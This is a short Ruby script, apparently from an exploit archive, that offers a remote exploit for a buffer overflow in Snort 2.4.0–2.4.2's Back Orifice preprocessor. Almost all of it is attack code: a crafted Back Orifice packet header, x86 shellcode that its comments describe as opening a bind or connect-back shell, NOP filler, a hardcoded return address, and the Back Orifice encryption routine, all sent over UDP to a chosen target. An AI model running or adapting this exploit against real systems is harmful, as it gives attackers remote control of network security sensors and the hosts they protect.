#!/usr/bin/ruby -w # # # Version 0.1 (Public) # # snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit # # by xwings at mysec dot org # URL : http://www.mysec.org , somebody need to update the page # # Saying Hi to .... # # . All the 1337 c0d3r @ pulltheplug.org # . Gurus from #rubylang @ freenode.net # . Skywizard @ somewhere right now # . HITBSecConf CREW and Team Panda # # 03:07 <@mark> hey xwings # 03:07 <@mark> why don't you come up and see me sometime? # # Tested on : # Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux # gcc version 3.3.5 (Debian 1:3.3.5-13) # Snort 2.4.2 , ./configure && make && make install # # Use Ruby : http://www.ruby-lang.org # # # require 'socket' fathost = ARGV[0] packetsize = 1069 # ret is 1069 targetport = 9080 boheader = "*!*QWTY?" + [1096].pack("V") + # Length ,thanx Russell Sanford "\xed\xac\xef\x0d"+ # ID "\x01" # PING ## Port Bind 3964 . connectback, refer to Russell Sanford's code shellcode = "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"+ "\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b"+ "\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52"+ "\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2"+ "\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58"+ "\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69"+ "\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81" filler = "\x90" * (packetsize-(boheader.length + shellcode.length)) retadd = [0xbffff370].pack('L') darthcode = (shellcode+filler+retadd) def msrand(seed) @holdrand = 31337 end def mrand() return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff) end def bocrypt(takepayload) @arrpayload = (takepayload.split(//)) encpayload ="".to_s @holdrand=0 msrand(0) @arrpayload.each do |c| encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr end return encpayload end UDPSocket.open.send(bocrypt(boheader+darthcode), 0, fathost, targetport) # milw0rm.com [2005-11-11]